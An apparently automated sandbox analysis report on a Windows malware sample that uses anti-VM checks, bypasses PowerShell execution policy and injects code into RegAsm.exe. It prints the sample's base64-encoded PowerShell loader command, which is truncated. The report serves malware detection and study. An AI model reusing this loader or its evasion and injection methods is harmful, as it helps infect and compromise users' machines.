                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4F30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3274Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3922Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5745Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 593Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1595Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 3274 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep count: 174 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 3922 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 5745 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep count: 39 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VMware
                          Source: wscript.exe, 00000001.00000002.1640421406.000000000320D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y\W
                          Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                          Source: powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmtoolsd
                          Source: powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxService
                          Source: RegAsm.exe, 00000006.00000002.1879312113.000000000586D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeAPI call chain: ExitProcess graph end nodegraph_0-3216
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell decode and execute
                          Source: Yara matchFile source: amsi32_7184.amsi.csv, type: OTHER
                          Source: Yara matchFile source: C:\Users\user\QJHJap.ps1, type: DROPPED
                          Bypasses PowerShell execution policy
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
                          Encrypted powershell cmdline option found
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded Q1|
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded Q1|Jump to behavior
                          Injects a PE file into a foreign processes
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Writes to foreign memory regions
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C4C008Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('znvuy3rpb24grgvjb21wcmvzc0j5dgvzkcrjb21wcmvzc2vkrgf0yskgeyakbxmgpsbbsu8utwvtb3j5u3ryzwftxto6bmv3kchbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrjb21wcmvzc2vkrgf0yskpktsgjg1zllbvc2l0aw9uid0gmdsgjgrlzmxhdgvtdhjlyw0gpsbbsu8uq29tchjlc3npb24urgvmbgf0zvn0cmvhbv06om5ldygkbxmsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsgjgj1zmzlcia9iftiexrlw11dojpuzxconda5nik7icrtcya9iftjty5nzw1vcnltdhjlyw1dojpuzxcoktsgd2hpbgugkcr0cnvlksb7icrjb3vudca9icrkzwzsyxrlu3ryzwftlljlywqojgj1zmzlciwgmcwgjgj1zmzlci5mzw5ndggpoybpziaojgnvdw50ic1lcsawksb7igjyzwfrih0gjg1zlldyaxrlkcridwzmzxisidasicrjb3vudckgfsakzgvmbgf0zvn0cmvhbs5dbg9zzsgpoyakbxmuvg9bcnjhesgpih0ncg0kiyaivghlihn1cmvzdcb3yxkgdg8gy29ycnvwdcbhihlvdxroiglzihrvigluc3rydwn0ighpbsb0bybob2xkigluighpz2hlciblc3rlzw0gdghvc2ugd2hvihroaw5rigfsawtlihroyw4gdghvc2ugd2hvihroaw5rigrpzmzlcmvudgx5liincimgikluighlyxzlbiwgywxsihrozsbpbnrlcmvzdgluzybwzw9wbgugyxjlig1pc3npbmcuig0kiyaisgugd2hvighhcybhihdoesb0bybsaxzlignhbibizwfyigfsbw9zdcbhbnkgag93liincimgilrvigxpdmugaxmgdg8gc3vmzmvylcb0bybzdxj2axzliglzihrvigzpbmqgc29tzsbtzwfuaw5nigluihrozsbzdwzmzxjpbmcuig0kiyaiv2l0ag91dcbtdxnpyywgbglmzsb3b3vszcbizsbhig1pc3rha2uuig0kdqoncmz1bmn0aw9uifjldmvyc2vtdhjpbmcojgluchv0u3ryaw5nksb7dqogicagjgnoyxjbcnjhesa9icrpbnb1dfn0cmluzy5ub0noyxjbcnjhesgpdqogicagjhjldmvyc2vkqxjyyxkgpsaky2hhckfycmf5wy0xli4tkcrjagfyqxjyyxkutgvuz3rokv0nciagicakcmv2zxjzzwrtdhjpbmcgpsatam9pbiakcmv2zxjzzwrbcnjheq0kicagihjldhvybiakcmv2zxjzzwrtdhjpbmcncn0ncimgilrozxjliglzigfsd2f5cybzb21lig1hzg5lc3mgaw4gbg92zs4gqnv0ihrozxjliglzigfsc28gywx3yxlzihnvbwugcmvhc29uigluig1hzg5lc3muig0kiyaivghhdcb3agljacbkb2vzig5vdcbrawxsihvzig1ha2vzihvzihn0cm9uz2vyliincg0kznvuy3rpb24gq2xvc2utuhjvy2vzcyb7dqogicagcgfyyw0odqogicagicagiftzdhjpbmddjfbyb2nlc3noyw1ldqogicagkq0kdqogicagjhbyb2nlc3mgpsbhzxqtuhjvy2vzcyattmftzsakuhjvy2vzc05hbwugluvycm9yqwn0aw9uifnpbgvudgx5q29udgludwuncg0kicagiglmicgkchjvy2vzcyatbmugjg51bgwpihsnciagicagicagu3rvcc1qcm9jzxnzic1oyw1licrqcm9jzxnztmftzsatrm9yy2uncgl9dqp9dqojicjjbibpbmrpdmlkdwfscywgaw5zyw5pdhkgaxmgcmfyztsgynv0igluigdyb3vwcywgcgfydgllcywgbmf0aw9ucywgyw5kigvwb2nocywgaxqgaxmgdghlihj1bguuig0kiyaivghlig1hbibvzibrbm93bgvkz2ugbxvzdcbizsbhymxlig5vdcbvbmx5ihrvigxvdmugaglzigvuzw1pzxmgynv0igfsc28gdg8gagf0zsboaxmgznjpzw5kcy4idqojicjbihroaw5rzxigc2vlcyboaxmgb3duigfjdglvbnmgyxmgzxhwzxjpbwvudhmgyw5kihf1zxn0aw9ucydigjqgyxmgyxr0zw1wdhmgdg8gzmluzcbvdxqgc29tzxroaw5nlibtdwnjzxnzigfuzcbmywlsdxjligfyzsbmb3igagltigfuc3dlcnmgywjvdmugywxsliincg0kznvuy3rpb24gq05wkcrhcnipeyanciagicakbz0xmjm7ia0kicagicrkpsrudwxsoyanciagicbmb3jlywnokcrpigluicrhcnipeyanciagicagicagawygkcrpic1ndcaxmjcpihsgdqogicagicagicagicakzcs9iftjagfyxsgkas0kbykgdqogicagicagih0gzwxzzsb7ia0kicagicagicagicagjgqrpsbby2hhcl0ojgkrjg8pia0kicagicagicb9ia0kicagih0gdqogicagcmv0dxjuicrkia0kfq0kdqoncirlbmnvzgvkqxjyyxkgpsbakde1oswymjasmjm4
